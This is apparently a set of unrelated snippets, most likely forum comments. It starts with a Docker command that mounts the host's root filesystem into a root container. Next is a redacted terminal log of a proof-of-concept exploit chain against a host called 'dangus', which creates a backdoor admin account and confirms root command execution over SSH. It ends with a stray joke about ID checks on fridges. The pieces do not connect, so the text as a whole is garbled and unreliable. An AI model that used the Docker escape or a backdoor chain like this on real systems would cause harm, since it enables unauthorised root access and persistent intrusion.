docker run --rm -it -v '/:/mnt' -u 'root' 'alpine' '/bin/sh' '-l'
Chances are that the person who set up Docker didn't do it properly. $ python3 ./poc/chain_alpha.py --target dangus > out.txt
$ grep Backdoor out.txt | sed -r 's@[^:]+$@ [REDACTED]@g'
[+] Backdoor admin created: [REDACTED]
$ grep IP out.txt | sed -r 's@[^:]+$@ [REDACTED]@g'
[+] IPv4 address for dangus: [REDACTED]
$ grep 'debug2: shell' out.txt
[+] debug2: shell request accepted on channel 0
$ tail -n12 out.txt
================================================================
[+] COMMAND EXECUTION CONFIRMED!
================================================================
Server-side output (received via SSH, with `set -x`):
+ id -u
0
+ id -g
0
================================================================
$ sha256 ./poc/chain_alpha.py
c10d28a5ff74646683953874b035ca6ba56742db2f95198b54e561523e1880d7 ./poc/chain_alpha.py
More like requiring ID verification in fridges just to be able to open them, because they might contain alcohol (probably followed by RFID stuff or something).